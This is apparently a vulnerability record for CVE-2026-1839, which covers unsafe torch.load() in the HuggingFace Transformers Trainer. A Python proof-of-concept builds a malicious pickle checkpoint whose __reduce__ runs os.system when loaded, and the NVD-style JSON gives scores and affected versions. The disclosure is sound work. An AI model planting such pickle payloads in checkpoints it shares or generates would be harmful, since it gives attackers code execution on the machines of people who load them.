CVE-2026-1839

import os import pickle import torch # Define a malicious class that executes code when unpickled class ExploitPayload: def __reduce__(self): # Command to execute: e.g., create a file or reverse shell return (os.system, ('echo "CVE-2026-1839 POC Executed" > /tmp/pwned.txt',)) # Generate the malicious checkpoint file (rng_state.pth) print("[+] Creating malicious rng_state.pth...") with open('rng_state.pth', 'wb') as f: pickle.dump(ExploitPayload(), f) # Simulate the vulnerable behavior in Trainer._load_rng_state # This is what happens internally in the vulnerable library print("[+] Simulating vulnerable torch.load()...") try: # Vulnerable call: missing weights_only=True data = torch.load('rng_state.pth') print("[!] Exploit executed.") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-1839", "sourceIdentifier": "[email protected]", "published": "2026-04-07T06:16:41.490", "lastModified": "2026-04-28T16:39:31.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.0", "matchCriteriaId": "501E3796-D201-494C-B59D-FA598DC36738"}, {"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:5.0.0:rc0:*:*:*:*:*:*", "matchCriteriaId": "70A12094-61B0-49E7-9663-73E5B874E819"}, {"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:5.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "424574B4-B321-4D5A-BE48-95A61D9F3752"}, {"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:5.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "B3F5BCCD-1960-4809-9519-4ADDACAFB3D3"}]}]}], "references": [{"url": "https://github.com/huggingface/transformers/commit/03c8082ba4594c9b8d6fe190ca9bed0e5f8ca396", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}